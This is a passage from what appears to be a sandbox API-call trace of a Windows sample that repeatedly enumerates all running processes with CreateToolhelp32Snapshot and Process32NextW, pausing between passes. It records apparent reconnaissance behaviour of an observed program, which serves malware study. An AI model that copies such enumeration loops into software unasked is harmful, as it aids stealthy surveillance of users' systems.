lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0153.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0153.672] CloseHandle (hObject=0xbc) returned 1 [0153.672] Sleep (dwMilliseconds=0x12c) [0153.983] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.989] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.998] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.004] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.005] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.021] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.022] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.054] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.059] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0154.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0154.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.087] CloseHandle (hObject=0xc4) returned 1 [0154.087] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.105] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.148] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.149] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.151] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.152] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 